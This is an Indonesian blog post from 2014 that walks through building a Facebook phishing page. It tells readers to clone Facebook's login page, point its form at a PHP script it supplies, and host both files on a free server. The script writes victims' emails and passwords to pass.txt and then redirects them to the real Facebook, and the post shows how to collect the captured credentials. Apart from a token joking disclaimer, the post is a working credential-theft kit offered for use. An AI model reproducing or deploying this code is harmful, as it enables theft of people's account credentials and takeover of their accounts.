Kamis, 22 Mei 2014

Hacking : Cara Phising Facebook dengan Mudah

NB: Apapun yang anda dapatkan dari tulisan ini di luar tanggung jawab saya

Sebelum saya menceritakan eksperimen saya, perlu saya ingatkan kembali, kegiatan hacking adalah kegiatan yang sangat TIDAK BERMANFAAT, BUANG-BUANG WAKTU dan jangan lupakan tentang DOSA :D

Sebelum melakukan eksperimen ini, sebenarnya saya sudah tahu bagaimana caranya sejak lama. Tapi, berhubung 'mood' saya baru tumbuh kemarin, saya baru sempat menyampaikannya hari ini. hehehe

Yangharus agan persiapkan yang pertama adalah hosting. Karena pemakaiannya hanya sementara, pakai yang gratisan saja, misalnya 3owl.com, idhostinger.com atau terserah lah..

Okey. Let's start!

1. Buka halaman pertama Facebook.
2. Klik kanan -> View Page Source

3. Buka notepad dan copy kodenya kesini
3. Simpan dengan nama "index.php"
4. Cari kode :
 <form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1".....
lalu ganti dengan :
<form id="login_form" action="pass.php".....

5. Buat file baru dengan nama "pass.php" dengan isi kode sebagai berikut.

<?php
$email;
$pass;
$empass;
if(isset($_POST['email']))
{
    $email = $_POST['email'];
}
echo "\n";
if(isset($_POST['pass']))
{
    $pass = $_POST['pass'];
}

$empass = "$email - $pass --";

$h = fopen("pass.txt","a+");
fwrite($h,$empass,strlen($empass));
fclose($h);
header("Location: https://www.facebook.com/");
?>


6. Upload kedua file ini ke server. dan halaman phising siap digunakan :)
 
7. Lihat hasilnya pada server

*) Hasilnya bisa dilihat pada file "pass.txt" :)
*) Jika diketahui oleh admin, keesokan harinya akan diblokir :p
*) Hanya mendukung tampilan desktop. Jika ingin mendukung mobile, buka m.facebook.com
Load disqus comments

0 comments